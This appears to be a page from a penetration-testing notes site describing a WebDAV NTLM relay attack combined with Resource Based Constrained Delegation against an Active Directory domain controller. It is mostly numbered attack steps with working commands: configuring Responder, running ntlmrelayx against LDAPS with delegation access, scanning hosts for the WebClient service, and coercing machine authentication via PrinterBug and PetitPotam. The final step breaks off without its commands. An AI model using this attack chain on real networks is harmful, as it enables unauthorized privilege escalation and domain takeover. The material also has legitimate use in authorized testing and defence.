githubEdit

WebDav Relaying

Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB

Requirements

1) WebClient service

Exploitation

1) Disable HTTP in Responder: sudo vi /usr/share/responder/Responder.conf

2) Generate a Windows machine name: sudo responder -I eth0 , e.g: WIN-UBNW4FI3AP0

3) Prepare for RBCD against the DC:

python3 ntlmrelayx.py -t ldaps://dc --delegateaccess -smb2support

4) Discover WebDAV services

webclientservicescanner 'domain.local'/'user':'password'@'machine'

crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav

GetWebDAVStatus.exe 'machine'

5) Trigger the authentication to relay to our ntlmrelayx:

the listener host must be specified with the FQDN or full netbios name like logger.domain.local@80/test.txt . Specifying the IP results in anonymous auth instead of System.

PrinterBug

PetitPotam

6) Use the created account to ask for a service ticket:

Last updated